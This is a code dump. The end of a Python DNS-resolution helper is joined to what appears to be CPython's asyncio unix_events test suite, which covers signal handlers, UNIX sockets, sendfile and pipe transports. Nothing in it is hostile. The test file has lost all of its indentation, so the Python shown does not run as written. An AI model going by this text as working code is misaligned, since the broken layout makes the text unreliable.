            if hostname == '':
                IP_LIST[" "] = "FAILED"
            else:
                t = threading.Thread(target=get_nameresolver_output, args=(hostname, IP_LIST))
                t.start()
                threads.append(t)
        # join after all workers have started so the lookups actually run in parallel
        for t in threads:
            t.join()
        return IP_LIST
    except Exception as e:
        logging.error(e)
        return {}
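# Illustrative usage (assumption, not part of the original module; the sample
# addresses below are placeholders):
if __name__ == "__main__":
    ip_status, hostnames = ip_resolution_check(["8.8.8.8", "not-an-ip"])
    print("IP status :", ip_status)
    print("Hostnames :", hostnames)
    print("Forward   :", hostname_resolution_check(["dns.google", ""]))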
|
test_unix_events.py
|
"""Tests for unix_events.py."""
import collections
import contextlib
import errno
import io
import os
import pathlib
import signal
import socket
import stat
import sys
import tempfile
import threading
import unittest
from unittest import mock
from test import support
if sys.platform == 'win32':
raise unittest.SkipTest('UNIX only')
import asyncio
from asyncio import log
from asyncio import unix_events
from test.test_asyncio import utils as test_utils
MOCK_ANY = mock.ANY
def tearDownModule():
asyncio.set_event_loop_policy(None)
def close_pipe_transport(transport):
# Don't call transport.close() because the event loop and the selector
# are mocked
if transport._pipe is None:
return
transport._pipe.close()
transport._pipe = None
@unittest.skipUnless(signal, 'Signals are not supported')
class SelectorEventLoopSignalTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.SelectorEventLoop()
self.set_event_loop(self.loop)
def test_check_signal(self):
self.assertRaises(
TypeError, self.loop._check_signal, '1')
self.assertRaises(
ValueError, self.loop._check_signal, signal.NSIG + 1)
def test_handle_signal_no_handler(self):
self.loop._handle_signal(signal.NSIG + 1)
def test_handle_signal_cancelled_handler(self):
h = asyncio.Handle(mock.Mock(), (),
loop=mock.Mock())
h.cancel()
self.loop._signal_handlers[signal.NSIG + 1] = h
self.loop.remove_signal_handler = mock.Mock()
self.loop._handle_signal(signal.NSIG + 1)
self.loop.remove_signal_handler.assert_called_with(signal.NSIG + 1)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_setup_error(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
m_signal.set_wakeup_fd.side_effect = ValueError
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_coroutine_error(self, m_signal):
m_signal.NSIG = signal.NSIG
async def simple_coroutine():
pass
# callback must not be a coroutine function
coro_func = simple_coroutine
coro_obj = coro_func()
self.addCleanup(coro_obj.close)
for func in (coro_func, coro_obj):
self.assertRaisesRegex(
TypeError, 'coroutines cannot be used with add_signal_handler',
self.loop.add_signal_handler,
signal.SIGINT, func)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
cb = lambda: True
self.loop.add_signal_handler(signal.SIGHUP, cb)
h = self.loop._signal_handlers.get(signal.SIGHUP)
self.assertIsInstance(h, asyncio.Handle)
self.assertEqual(h._callback, cb)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_install_error(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
def set_wakeup_fd(fd):
if fd == -1:
raise ValueError()
m_signal.set_wakeup_fd = set_wakeup_fd
class Err(OSError):
errno = errno.EFAULT
m_signal.signal.side_effect = Err
self.assertRaises(
Err,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_add_signal_handler_install_error2(self, m_logging, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
self.loop._signal_handlers[signal.SIGHUP] = lambda: True
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
self.assertFalse(m_logging.info.called)
self.assertEqual(1, m_signal.set_wakeup_fd.call_count)
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_add_signal_handler_install_error3(self, m_logging, m_signal):
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
self.assertFalse(m_logging.info.called)
self.assertEqual(2, m_signal.set_wakeup_fd.call_count)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.assertTrue(
self.loop.remove_signal_handler(signal.SIGHUP))
self.assertTrue(m_signal.set_wakeup_fd.called)
self.assertTrue(m_signal.signal.called)
self.assertEqual(
(signal.SIGHUP, m_signal.SIG_DFL), m_signal.signal.call_args[0])
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_2(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.SIGINT = signal.SIGINT
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGINT, lambda: True)
self.loop._signal_handlers[signal.SIGHUP] = object()
m_signal.set_wakeup_fd.reset_mock()
self.assertTrue(
self.loop.remove_signal_handler(signal.SIGINT))
self.assertFalse(m_signal.set_wakeup_fd.called)
self.assertTrue(m_signal.signal.called)
self.assertEqual(
(signal.SIGINT, m_signal.default_int_handler),
m_signal.signal.call_args[0])
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_remove_signal_handler_cleanup_error(self, m_logging, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
m_signal.set_wakeup_fd.side_effect = ValueError
self.loop.remove_signal_handler(signal.SIGHUP)
self.assertTrue(m_logging.info)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_error(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
m_signal.signal.side_effect = OSError
self.assertRaises(
OSError, self.loop.remove_signal_handler, signal.SIGHUP)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_error2(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
self.assertRaises(
RuntimeError, self.loop.remove_signal_handler, signal.SIGHUP)
@mock.patch('asyncio.unix_events.signal')
def test_close(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.loop.add_signal_handler(signal.SIGCHLD, lambda: True)
self.assertEqual(len(self.loop._signal_handlers), 2)
m_signal.set_wakeup_fd.reset_mock()
self.loop.close()
self.assertEqual(len(self.loop._signal_handlers), 0)
m_signal.set_wakeup_fd.assert_called_once_with(-1)
@mock.patch('asyncio.unix_events.sys')
@mock.patch('asyncio.unix_events.signal')
def test_close_on_finalizing(self, m_signal, m_sys):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.assertEqual(len(self.loop._signal_handlers), 1)
m_sys.is_finalizing.return_value = True
m_signal.signal.reset_mock()
with self.assertWarnsRegex(ResourceWarning,
"skipping signal handlers removal"):
self.loop.close()
self.assertEqual(len(self.loop._signal_handlers), 0)
self.assertFalse(m_signal.signal.called)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'),
'UNIX Sockets are not supported')
class SelectorEventLoopUnixSocketTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.SelectorEventLoop()
self.set_event_loop(self.loop)
@support.skip_unless_bind_unix_socket
def test_create_unix_server_existing_path_sock(self):
with test_utils.unix_socket_path() as path:
sock = socket.socket(socket.AF_UNIX)
sock.bind(path)
sock.listen(1)
sock.close()
coro = self.loop.create_unix_server(lambda: None, path)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
@support.skip_unless_bind_unix_socket
def test_create_unix_server_pathlib(self):
with test_utils.unix_socket_path() as path:
path = pathlib.Path(path)
srv_coro = self.loop.create_unix_server(lambda: None, path)
srv = self.loop.run_until_complete(srv_coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
def test_create_unix_connection_pathlib(self):
with test_utils.unix_socket_path() as path:
path = pathlib.Path(path)
coro = self.loop.create_unix_connection(lambda: None, path)
with self.assertRaises(FileNotFoundError):
# If pathlib.Path wasn't supported, the exception would be
# different.
self.loop.run_until_complete(coro)
def test_create_unix_server_existing_path_nonsock(self):
with tempfile.NamedTemporaryFile() as file:
coro = self.loop.create_unix_server(lambda: None, file.name)
with self.assertRaisesRegex(OSError,
'Address.*is already in use'):
self.loop.run_until_complete(coro)
def test_create_unix_server_ssl_bool(self):
coro = self.loop.create_unix_server(lambda: None, path='spam',
ssl=True)
with self.assertRaisesRegex(TypeError,
'ssl argument must be an SSLContext'):
self.loop.run_until_complete(coro)
def test_create_unix_server_nopath_nosock(self):
coro = self.loop.create_unix_server(lambda: None, path=None)
with self.assertRaisesRegex(ValueError,
'path was not specified, and no sock'):
self.loop.run_until_complete(coro)
def test_create_unix_server_path_inetsock(self):
sock = socket.socket()
with sock:
coro = self.loop.create_unix_server(lambda: None, path=None,
sock=sock)
with self.assertRaisesRegex(ValueError,
'A UNIX Domain Stream.*was expected'):
self.loop.run_until_complete(coro)
def test_create_unix_server_path_dgram(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_unix_server(lambda: None, path=None,
sock=sock)
with self.assertRaisesRegex(ValueError,
'A UNIX Domain Stream.*was expected'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'no socket.SOCK_NONBLOCK (linux only)')
@support.skip_unless_bind_unix_socket
def test_create_unix_server_path_stream_bittype(self):
sock = socket.socket(
socket.AF_UNIX, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
with tempfile.NamedTemporaryFile() as file:
fn = file.name
try:
with sock:
sock.bind(fn)
coro = self.loop.create_unix_server(lambda: None, path=None,
sock=sock)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
finally:
os.unlink(fn)
def test_create_unix_server_ssl_timeout_with_plain_sock(self):
coro = self.loop.create_unix_server(lambda: None, path='spam',
ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_path_inetsock(self):
sock = socket.socket()
with sock:
coro = self.loop.create_unix_connection(lambda: None,
sock=sock)
with self.assertRaisesRegex(ValueError,
'A UNIX Domain Stream.*was expected'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.unix_events.socket')
def test_create_unix_server_bind_error(self, m_socket):
# Ensure that the socket is closed on any bind error
sock = mock.Mock()
m_socket.socket.return_value = sock
sock.bind.side_effect = OSError
coro = self.loop.create_unix_server(lambda: None, path="/test")
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
sock.bind.side_effect = MemoryError
coro = self.loop.create_unix_server(lambda: None, path="/test")
with self.assertRaises(MemoryError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
def test_create_unix_connection_path_sock(self):
coro = self.loop.create_unix_connection(
lambda: None, os.devnull, sock=object())
with self.assertRaisesRegex(ValueError, 'path and sock can not be'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_nopath_nosock(self):
coro = self.loop.create_unix_connection(
lambda: None, None)
with self.assertRaisesRegex(ValueError,
'no path and sock were specified'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_nossl_serverhost(self):
coro = self.loop.create_unix_connection(
lambda: None, os.devnull, server_hostname='spam')
with self.assertRaisesRegex(ValueError,
'server_hostname is only meaningful'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_ssl_noserverhost(self):
coro = self.loop.create_unix_connection(
lambda: None, os.devnull, ssl=True)
with self.assertRaisesRegex(
ValueError, 'you have to pass server_hostname when using ssl'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_ssl_timeout_with_plain_sock(self):
coro = self.loop.create_unix_connection(lambda: None, path='spam',
ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(os, 'sendfile'),
'sendfile is not supported')
class SelectorEventLoopUnixSockSendfileTests(test_utils.TestCase):
DATA = b"12345abcde" * 16 * 1024 # 160 KiB
class MyProto(asyncio.Protocol):
def __init__(self, loop):
self.started = False
self.closed = False
self.data = bytearray()
self.fut = loop.create_future()
self.transport = None
self._ready = loop.create_future()
def connection_made(self, transport):
self.started = True
self.transport = transport
self._ready.set_result(None)
def data_received(self, data):
self.data.extend(data)
def connection_lost(self, exc):
self.closed = True
self.fut.set_result(None)
async def wait_closed(self):
await self.fut
@classmethod
def setUpClass(cls):
with open(support.TESTFN, 'wb') as fp:
fp.write(cls.DATA)
super().setUpClass()
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
super().tearDownClass()
def setUp(self):
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
self.file = open(support.TESTFN, 'rb')
self.addCleanup(self.file.close)
super().setUp()
def make_socket(self, cleanup=True):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(False)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024)
if cleanup:
self.addCleanup(sock.close)
return sock
def run_loop(self, coro):
return self.loop.run_until_complete(coro)
def prepare(self):
sock = self.make_socket()
proto = self.MyProto(self.loop)
port = support.find_unused_port()
srv_sock = self.make_socket(cleanup=False)
srv_sock.bind((support.HOST, port))
server = self.run_loop(self.loop.create_server(
lambda: proto, sock=srv_sock))
self.run_loop(self.loop.sock_connect(sock, (support.HOST, port)))
self.run_loop(proto._ready)
def cleanup():
proto.transport.close()
self.run_loop(proto.wait_closed())
server.close()
self.run_loop(server.wait_closed())
self.addCleanup(cleanup)
return sock, proto
def test_sock_sendfile_not_available(self):
sock, proto = self.prepare()
with mock.patch('asyncio.unix_events.os', spec=[]):
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"os[.]sendfile[(][)] is not available"):
self.run_loop(self.loop._sock_sendfile_native(sock, self.file,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_not_a_file(self):
sock, proto = self.prepare()
f = object()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"not a regular file"):
self.run_loop(self.loop._sock_sendfile_native(sock, f,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_iobuffer(self):
sock, proto = self.prepare()
f = io.BytesIO()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"not a regular file"):
self.run_loop(self.loop._sock_sendfile_native(sock, f,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_not_regular_file(self):
sock, proto = self.prepare()
f = mock.Mock()
f.fileno.return_value = -1
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"not a regular file"):
self.run_loop(self.loop._sock_sendfile_native(sock, f,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_cancel1(self):
sock, proto = self.prepare()
fut = self.loop.create_future()
fileno = self.file.fileno()
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
fut.cancel()
with contextlib.suppress(asyncio.CancelledError):
self.run_loop(fut)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
def test_sock_sendfile_cancel2(self):
sock, proto = self.prepare()
fut = self.loop.create_future()
fileno = self.file.fileno()
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
fut.cancel()
self.loop._sock_sendfile_native_impl(fut, sock.fileno(), sock, fileno,
0, None, len(self.DATA), 0)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
def test_sock_sendfile_blocking_error(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = mock.Mock()
fut.cancelled.return_value = False
with mock.patch('os.sendfile', side_effect=BlockingIOError()):
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
key = self.loop._selector.get_key(sock)
self.assertIsNotNone(key)
fut.add_done_callback.assert_called_once_with(mock.ANY)
def test_sock_sendfile_os_error_first_call(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = self.loop.create_future()
with mock.patch('os.sendfile', side_effect=OSError()):
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
exc = fut.exception()
self.assertIsInstance(exc, asyncio.SendfileNotAvailableError)
self.assertEqual(0, self.file.tell())
def test_sock_sendfile_os_error_next_call(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = self.loop.create_future()
err = OSError()
with mock.patch('os.sendfile', side_effect=err):
self.loop._sock_sendfile_native_impl(fut, sock.fileno(),
sock, fileno,
1000, None, len(self.DATA),
1000)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
exc = fut.exception()
self.assertIs(exc, err)
self.assertEqual(1000, self.file.tell())
def test_sock_sendfile_exception(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = self.loop.create_future()
err = asyncio.SendfileNotAvailableError()
with mock.patch('os.sendfile', side_effect=err):
self.loop._sock_sendfile_native_impl(fut, sock.fileno(),
sock, fileno,
1000, None, len(self.DATA),
1000)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
exc = fut.exception()
self.assertIs(exc, err)
self.assertEqual(1000, self.file.tell())
class UnixReadPipeTransportTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = self.new_test_loop()
self.protocol = test_utils.make_test_protocol(asyncio.Protocol)
self.pipe = mock.Mock(spec_set=io.RawIOBase)
self.pipe.fileno.return_value = 5
blocking_patcher = mock.patch('os.set_blocking')
blocking_patcher.start()
self.addCleanup(blocking_patcher.stop)
fstat_patcher = mock.patch('os.fstat')
m_fstat = fstat_patcher.start()
st = mock.Mock()
st.st_mode = stat.S_IFIFO
m_fstat.return_value = st
self.addCleanup(fstat_patcher.stop)
def read_pipe_transport(self, waiter=None):
transport = unix_events._UnixReadPipeTransport(self.loop, self.pipe,
self.protocol,
waiter=waiter)
self.addCleanup(close_pipe_transport, transport)
return transport
def test_ctor(self):
waiter = self.loop.create_future()
tr = self.read_pipe_transport(waiter=waiter)
self.loop.run_until_complete(waiter)
self.protocol.connection_made.assert_called_with(tr)
self.loop.assert_reader(5, tr._read_ready)
self.assertIsNone(waiter.result())
@mock.patch('os.read')
def test__read_ready(self, m_read):
tr = self.read_pipe_transport()
m_read.return_value = b'data'
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
self.protocol.data_received.assert_called_with(b'data')
@mock.patch('os.read')
def test__read_ready_eof(self, m_read):
tr = self.read_pipe_transport()
m_read.return_value = b''
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.eof_received.assert_called_with()
self.protocol.connection_lost.assert_called_with(None)
@mock.patch('os.read')
def test__read_ready_blocked(self, m_read):
tr = self.read_pipe_transport()
m_read.side_effect = BlockingIOError
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
test_utils.run_briefly(self.loop)
self.assertFalse(self.protocol.data_received.called)
@mock.patch('asyncio.log.logger.error')
@mock.patch('os.read')
def test__read_ready_error(self, m_read, m_logexc):
tr = self.read_pipe_transport()
err = OSError()
m_read.side_effect = err
tr._close = mock.Mock()
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
tr._close.assert_called_with(err)
m_logexc.assert_called_with(
test_utils.MockPattern(
'Fatal read error on pipe transport'
'\nprotocol:.*\ntransport:.*'),
exc_info=(OSError, MOCK_ANY, MOCK_ANY))
@mock.patch('os.read')
def test_pause_reading(self, m_read):
tr = self.read_pipe_transport()
m = mock.Mock()
self.loop.add_reader(5, m)
tr.pause_reading()
self.assertFalse(self.loop.readers)
@mock.patch('os.read')
def test_resume_reading(self, m_read):
tr = self.read_pipe_transport()
tr.pause_reading()
tr.resume_reading()
self.loop.assert_reader(5, tr._read_ready)
@mock.patch('os.read')
def test_close(self, m_read):
tr = self.read_pipe_transport()
tr._close = mock.Mock()
tr.close()
tr._close.assert_called_with(None)
@mock.patch('os.read')
def test_close_already_closing(self, m_read):
tr = self.read_pipe_transport()
tr._closing = True
tr._close = mock.Mock()
tr.close()
self.assertFalse(tr._close.called)
@mock.patch('os.read')
def test__close(self, m_read):
tr = self.read_pipe_transport()
err = object()
tr._close(err)
self.assertTrue(tr.is_closing())
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(err)
def test__call_connection_lost(self):
tr = self.read_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = None
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test__call_connection_lost_with_err(self):
tr = self.read_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = OSError()
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test_pause_reading_on_closed_pipe(self):
tr = self.read_pipe_transport()
tr.close()
test_utils.run_briefly(self.loop)
self.assertIsNone(tr._loop)
tr.pause_reading()
def test_pause_reading_on_paused_pipe(self):
tr = self.read_pipe_transport()
tr.pause_reading()
# the second call should do nothing
tr.pause_reading()
def test_resume_reading_on_closed_pipe(self):
tr = self.read_pipe_transport()
tr.close()
test_utils.run_briefly(self.loop)
self.assertIsNone(tr._loop)
tr.resume_reading()
def test_resume_reading_on_paused_pipe(self):
tr = self.read_pipe_transport()
# the pipe is not paused
# resuming should do nothing
tr.resume_reading()
class UnixWritePipeTransportTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = self.new_test_loop()
self.protocol = test_utils.make_test_protocol(asyncio.BaseProtocol)
self.pipe = mock.Mock(spec_set=io.RawIOBase)
self.pipe.fileno.return_value = 5
blocking_patcher = mock.patch('os.set_blocking')
blocking_patcher.start()
self.addCleanup(blocking_patcher.stop)
fstat_patcher = mock.patch('os.fstat')
m_fstat = fstat_patcher.start()
st = mock.Mock()
st.st_mode = stat.S_IFSOCK
m_fstat.return_value = st
self.addCleanup(fstat_patcher.stop)
def write_pipe_transport(self, waiter=None):
transport = unix_events._UnixWritePipeTransport(self.loop, self.pipe,
self.protocol,
waiter=waiter)
self.addCleanup(close_pipe_transport, transport)
return transport
def test_ctor(self):
waiter = self.loop.create_future()
tr = self.write_pipe_transport(waiter=waiter)
self.loop.run_until_complete(waiter)
self.protocol.connection_made.assert_called_with(tr)
self.loop.assert_reader(5, tr._read_ready)
self.assertEqual(None, waiter.result())
def test_can_write_eof(self):
tr = self.write_pipe_transport()
self.assertTrue(tr.can_write_eof())
@mock.patch('os.write')
def test_write(self, m_write):
tr = self.write_pipe_transport()
m_write.return_value = 4
tr.write(b'data')
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(), tr._buffer)
@mock.patch('os.write')
def test_write_no_data(self, m_write):
tr = self.write_pipe_transport()
tr.write(b'')
self.assertFalse(m_write.called)
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(b''), tr._buffer)
@mock.patch('os.write')
def test_write_partial(self, m_write):
tr = self.write_pipe_transport()
m_write.return_value = 2
tr.write(b'data')
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'ta'), tr._buffer)
@mock.patch('os.write')
def test_write_buffer(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'previous')
tr.write(b'data')
self.assertFalse(m_write.called)
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'previousdata'), tr._buffer)
@mock.patch('os.write')
def test_write_again(self, m_write):
tr = self.write_pipe_transport()
m_write.side_effect = BlockingIOError()
tr.write(b'data')
m_write.assert_called_with(5, bytearray(b'data'))
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'data'), tr._buffer)
@mock.patch('asyncio.unix_events.logger')
@mock.patch('os.write')
def test_write_err(self, m_write, m_log):
tr = self.write_pipe_transport()
err = OSError()
m_write.side_effect = err
tr._fatal_error = mock.Mock()
tr.write(b'data')
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(), tr._buffer)
tr._fatal_error.assert_called_with(
err,
'Fatal write error on pipe transport')
self.assertEqual(1, tr._conn_lost)
tr.write(b'data')
self.assertEqual(2, tr._conn_lost)
tr.write(b'data')
tr.write(b'data')
tr.write(b'data')
tr.write(b'data')
# This is a bit overspecified. :-(
m_log.warning.assert_called_with(
'pipe closed by peer or os.write(pipe, data) raised exception.')
tr.close()
@mock.patch('os.write')
def test_write_close(self, m_write):
tr = self.write_pipe_transport()
tr._read_ready() # pipe was closed by peer
tr.write(b'data')
self.assertEqual(tr._conn_lost, 1)
tr.write(b'data')
self.assertEqual(tr._conn_lost, 2)
def test__read_ready(self):
tr = self.write_pipe_transport()
tr._read_ready()
self.assertFalse(self.loop.readers)
self.assertFalse(self.loop.writers)
self.assertTrue(tr.is_closing())
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
@mock.patch('os.write')
def test__write_ready(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.return_value = 4
tr._write_ready()
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(), tr._buffer)
@mock.patch('os.write')
def test__write_ready_partial(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.return_value = 3
tr._write_ready()
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'a'), tr._buffer)
@mock.patch('os.write')
def test__write_ready_again(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.side_effect = BlockingIOError()
tr._write_ready()
m_write.assert_called_with(5, bytearray(b'data'))
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'data'), tr._buffer)
@mock.patch('os.write')
def test__write_ready_empty(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.return_value = 0
tr._write_ready()
m_write.assert_called_with(5, bytearray(b'data'))
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'data'), tr._buffer)
@mock.patch('asyncio.log.logger.error')
@mock.patch('os.write')
def test__write_ready_err(self, m_write, m_logexc):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.side_effect = err = OSError()
tr._write_ready()
self.assertFalse(self.loop.writers)
self.assertFalse(self.loop.readers)
self.assertEqual(bytearray(), tr._buffer)
self.assertTrue(tr.is_closing())
m_logexc.assert_not_called()
self.assertEqual(1, tr._conn_lost)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(err)
@mock.patch('os.write')
def test__write_ready_closing(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._closing = True
tr._buffer = bytearray(b'data')
m_write.return_value = 4
tr._write_ready()
self.assertFalse(self.loop.writers)
self.assertFalse(self.loop.readers)
self.assertEqual(bytearray(), tr._buffer)
self.protocol.connection_lost.assert_called_with(None)
self.pipe.close.assert_called_with()
@mock.patch('os.write')
def test_abort(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
self.loop.add_reader(5, tr._read_ready)
tr._buffer = [b'da', b'ta']
tr.abort()
self.assertFalse(m_write.called)
self.assertFalse(self.loop.readers)
self.assertFalse(self.loop.writers)
self.assertEqual([], tr._buffer)
self.assertTrue(tr.is_closing())
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
def test__call_connection_lost(self):
tr = self.write_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = None
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test__call_connection_lost_with_err(self):
tr = self.write_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = OSError()
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test_close(self):
tr = self.write_pipe_transport()
tr.write_eof = mock.Mock()
tr.close()
tr.write_eof.assert_called_with()
# closing the transport twice must not fail
tr.close()
def test_close_closing(self):
tr = self.write_pipe_transport()
tr.write_eof = mock.Mock()
tr._closing = True
tr.close()
self.assertFalse(tr.write_eof.called)
